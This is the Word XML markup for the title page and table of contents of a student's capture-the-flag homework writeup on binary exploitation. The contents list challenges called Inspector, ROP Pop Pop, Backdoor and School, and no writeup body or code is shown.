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26629" w14:textId="364DB7F6" w:rsidR="000E2AB3" w:rsidRDefault="00996E4A" w:rsidP="00D139EB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc161243431"/>
      <w:r>
        <w:t xml:space="preserve">Homework </w:t>
      </w:r>
      <w:r w:rsidR="00D36A3C">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D139EB">
        <w:t>Challenge Writeup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6F73F2AE" w14:textId="72011FDA" w:rsidR="00115EE2" w:rsidRPr="00115EE2" w:rsidRDefault="00252A48" w:rsidP="00115EE2">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Pwn Part </w:t>
      </w:r>
      <w:r w:rsidR="00E676B6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00D36A3C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>hree</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5AF0B5" w14:textId="5C52FF88" w:rsidR="00D139EB" w:rsidRDefault="00D139EB" w:rsidP="00D139EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>Lindsay Von Tish</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7F78B5" w14:textId="62C62CBF" w:rsidR="00D139EB" w:rsidRDefault="00D139EB" w:rsidP="00D139EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>lmv9443@nyu.edu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="519E3ED4" w14:textId="6F1C3B3D" w:rsidR="00D139EB" w:rsidRPr="00D139EB" w:rsidRDefault="00D139EB" w:rsidP="00D139EB">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00E676B6">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r w:rsidR="00D36A3C">
        <w:t>13</w:t>
      </w:r>
      <w:r>
        <w:t>/2024</w:t>
      </w:r>
    </w:p>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsiaTheme="minorHAnsi" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="auto"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:id w:val="-1132630467"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="680CB08C" w14:textId="250F7D1A" w:rsidR="0061682E" w:rsidRPr="005264D0" w:rsidRDefault="00087743">
          <w:pPr>
            <w:pStyle w:val="TOCHeading"/>
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:t>Table of Contents</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2F206053" w14:textId="78047DEA" w:rsidR="00AF0191" w:rsidRDefault="00087743">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r w:rsidRPr="005264D0">
            <w:rPr>
              <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
            </w:rPr>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc161243431" w:history="1">
            <w:r w:rsidR="00AF0191" w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Homework 6 Challenge Writeup</w:t>
            </w:r>
            <w:r w:rsidR="00AF0191">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00AF0191">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00AF0191">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243431 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00AF0191">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00AF0191">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00AF0191">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="081C2D84" w14:textId="4878A3DC" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243432" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Challenge Details</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243432 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3C0AE0DE" w14:textId="5C9BEA3C" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243433" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Inspector</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243433 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="08617C2B" w14:textId="18D1CC63" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243434" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243434 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1EE53718" w14:textId="2324FF8C" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243435" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243435 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>2</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5A7F5368" w14:textId="213F4D7C" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243436" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>ROP Pop Pop</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243436 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="61AFA5C1" w14:textId="63D18251" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243437" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Overview</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243437 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A76C950" w14:textId="33EFB4D7" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243438" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Details</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243438 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>10</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="2A15C0A1" w14:textId="35991D50" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243439" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A: Student Information</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243439 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F8BADAB" w14:textId="63274EC8" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243440" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Append</w:t>
            </w:r>
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>i</w:t>
            </w:r>
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>x B: Tools</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243440 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>19</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4C92300B" w14:textId="67A246E8" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243441" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix C: Backdoor and School</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243441 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="1F49F54F" w14:textId="76A327FF" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243442" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Backdoor</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243442 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="73548CF8" w14:textId="45CDB399" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc161243443" w:history="1">
            <w:r w:rsidRPr="00843D31">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>School</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc161243443 \h </w:instrText>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="0070558B">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="0DB10BEB" w14:textId="01430068" w:rsidR="00AF0191" w:rsidRDefault="00AF0191">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="9350"/>
            </w:tabs>
            <w:rPr>
              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
